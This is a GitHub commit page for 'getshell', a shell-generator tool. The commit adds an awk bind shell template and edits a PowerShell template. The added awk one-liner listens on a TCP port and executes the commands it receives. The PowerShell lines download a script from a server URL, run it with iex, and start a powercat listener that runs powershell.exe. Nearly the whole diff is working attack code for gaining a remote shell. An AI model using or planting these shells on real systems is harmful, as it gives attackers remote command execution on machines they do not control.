Skip to content

Commit

Permalink
add awk bind shell
Browse files Browse the repository at this point in the history
  • Loading branch information
dadevel committed Aug 29, 2024
1 parent 1bc9b99 commit 7731364
Show file tree
Hide file tree
Showing 3 changed files with 3 additions and 2 deletions.
2 changes: 1 addition & 1 deletion getshell/templates/bind/listener/powercat.ps1
Original file line number Diff line number Diff line change
@@ -1,2 +1,2 @@
iex (New-Object System.Net.Webclient).DownloadString('§SRVURL§')
iex (New-Object System.Net.Webclient).DownloadString('{{ SRVURL }}')
powercat -l -p {{ LPORT }} -e powershell.exe
1 change: 1 addition & 0 deletions getshell/templates/bind/listener/tcp.awk
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
BEGIN{s="/inet/tcp/{{ LPORT }}/0/0";do{if((s|&getline c)<=0)break;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}
2 changes: 1 addition & 1 deletion pyproject.toml
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
[tool.poetry]
name = "getshell"
version = "0.5.1"
version = "0.5.2"
description = "Web, bind and reverse shell generator"
authors = ["dadevel <dadevel@disroot.org>"]
license = "MIT"
Expand Down

0 comments on commit 7731364

Please sign in to comment.